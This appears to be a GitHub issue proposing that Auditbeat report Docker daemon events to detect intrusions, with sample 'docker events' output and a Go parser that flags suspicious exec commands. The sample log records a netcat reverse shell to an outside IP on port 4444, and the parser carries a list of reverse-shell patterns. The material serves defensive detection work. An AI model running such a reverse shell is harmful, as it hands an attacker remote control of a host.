[Auditbeat] Add support for reporting Docker events #6799

@kholia

The docker events utility can report the various Docker events that are happening.

In CLI terminal 1,

$ sudo docker exec -it kibana-container bash

$ sudo docker exec -it elasticsearch-container bash

$ sudo docker top kibana-container

<Attacker exploiting another application, and able to talk to a Docker daemon>

In CLI terminal 2,

# docker events
2018-04-07T21:13:06.015608218+05:30 container exec_create: bash  6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:06.022901891+05:30 container exec_start: bash  6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:34.756051931+05:30 container exec_create: bash  04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:13:34.763466352+05:30 container exec_start: bash  04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:20:11.095365653+05:30 container top 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)

2018-04-07T21:34:00.265485765+05:30 container exec_start: netcat 218.107.131.65 4444 -e /bin/bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)

Reporting such Docker events to Elasticsearch via Auditbeat should help in detecting attacks (powered by CSRF, SSRF security flaws) and other intrusions against the Docker daemon (socket).

I learnt about this idea from @jeredding.
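As an added example (not code from this issue or from Auditbeat), here is a small Go parser for the `docker events` text format quoted above, with a starter check that flags `exec_*` events whose command looks like a reverse or interactive shell. The pattern list is an assumption, and the sample lines used for checking it are taken from the output above.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is one parsed line of `docker events` text output.
type Event struct {
	Timestamp, Type, Action, Command, ContainerID string
	Attrs                                         map[string]string
}

// lineRe matches: <ts> <type> <action>[: <command>] <64-hex container id> (<k=v>, ...)
var lineRe = regexp.MustCompile(`^(\S+) (\S+) (\w+)(?:: (.*?))?\s+([0-9a-f]{64}) \((.*)\)$`)

// ParseEvent parses a single event line; ok is false for lines that do not match.
func ParseEvent(line string) (ev Event, ok bool) {
	m := lineRe.FindStringSubmatch(strings.TrimSpace(line))
	if m == nil {
		return Event{}, false
	}
	ev = Event{Timestamp: m[1], Type: m[2], Action: m[3], Command: m[4],
		ContainerID: m[5], Attrs: map[string]string{}}
	for _, kv := range strings.Split(m[6], ", ") {
		if p := strings.SplitN(kv, "=", 2); len(p) == 2 {
			ev.Attrs[p[0]] = p[1]
		}
	}
	return ev, true
}

// shellPatterns is an assumed starter list of substrings that commonly
// appear in reverse-shell or interactive-shell exec commands.
var shellPatterns = []string{"-e /bin/", "/dev/tcp/", "netcat", "nc ", "bash -i"}

// Suspicious reports whether a container exec_* event's command matches a pattern.
func Suspicious(ev Event) (bool, string) {
	if ev.Type != "container" || !strings.HasPrefix(ev.Action, "exec_") {
		return false, ""
	}
	for _, p := range shellPatterns {
		if strings.Contains(ev.Command, p) {
			return true, fmt.Sprintf("exec in %s matched %q", ev.Attrs["name"], p)
		}
	}
	return false, ""
}
```

Feed each line of `docker events` to ParseEvent and alert on Suspicious; a plain `exec_create` into a production container is itself worth recording even when no pattern matches.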

Labels: Metricbeat, Team:Integrations, containers, discuss